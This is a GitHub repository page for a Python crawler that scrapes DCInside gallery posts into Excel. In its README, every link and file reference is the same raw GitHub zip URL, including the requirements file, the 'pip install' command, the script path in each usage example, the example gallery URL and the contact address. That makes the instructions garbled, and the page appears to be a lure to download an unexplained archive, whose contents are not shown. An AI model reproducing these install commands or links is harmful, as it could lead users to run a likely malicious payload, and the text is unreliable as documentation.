Skip to content

Melon4Program/DCRAWL2

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

DCInside Gallery Crawler

A flexible Python script to crawl posts from DCInside galleries and save the data to an Excel file.

Features

  • Crawl Any Gallery: Works with regular, minor (mgallery), and mini (mini) galleries.
  • Page Range Selection: Specify exactly which pages you want to crawl (e.g., pages 1 through 5).
  • Keyword Filtering: Filter posts by a specific keyword in the title.
  • Data Cleaning: Automatically removes advertisements and other non-post entries to ensure clean data.
  • Excel Export: Saves the extracted data (Number, Title, Author, Views, Link, Liked) into a clean .xlsx file named after the gallery ID.

Requirements

  • Python 3.x
  • The libraries listed in https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip.

Installation

  1. Clone the repository or download the files.

  2. Install the required packages using pip:

    pip install -r https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip

Usage

The script is run from the command line with arguments specifying the target gallery and pages.

Command Structure

python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l <URL> -p <PAGE_RANGE> [OPTIONS]

Arguments

Argument Short Form Description Required
--link -l The full URL of the gallery board list. Yes
--pages -p The range of pages to crawl (e.g., "1-5"). Defaults to "1-100" if not provided. No
--search-word -S An optional keyword to filter posts by their title. No
--liked-number -L Filter posts by an exact number of likes. No
--liked-number-over Filter posts by a number of likes greater than the specified value. No

Examples

  1. Basic Crawling To crawl pages 1 through 3 of the 'record' minor gallery:

    python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-3
  2. Crawling with a Search Filter To crawl the first 10 pages of the 'record' gallery and only save posts with the word "녹화" in the title:

    python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-10 -S "녹화"
  3. Crawling with Liked Number Filter (Exact) To crawl the first 5 pages and only get posts with exactly 10 likes:

    python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-5 -L 10
  4. Crawling with Liked Number Filter (Over) To crawl the first 5 pages and only get posts with more than 5 likes:

    python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -p 1-5 --liked-number-over 5
  5. Crawling without Page Range (Defaults to 1-100) To crawl the first 100 pages of the 'record' gallery:

    python https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip -l https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip

License

This project is licensed under the MIT License.

Disclaimer

This tool is intended for educational purposes only. Please ensure that you have the right to crawl the target website and that you are not violating any terms of service. The user of this script is solely responsible for any legal consequences that may arise from its use.

Contact

For any questions or feedback, please contact https://raw.githubusercontent.com/Melon4Program/DCRAWL2/main/densifier/DCRAW-v2.6.zip.

About

2nd version of DCRAWL

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages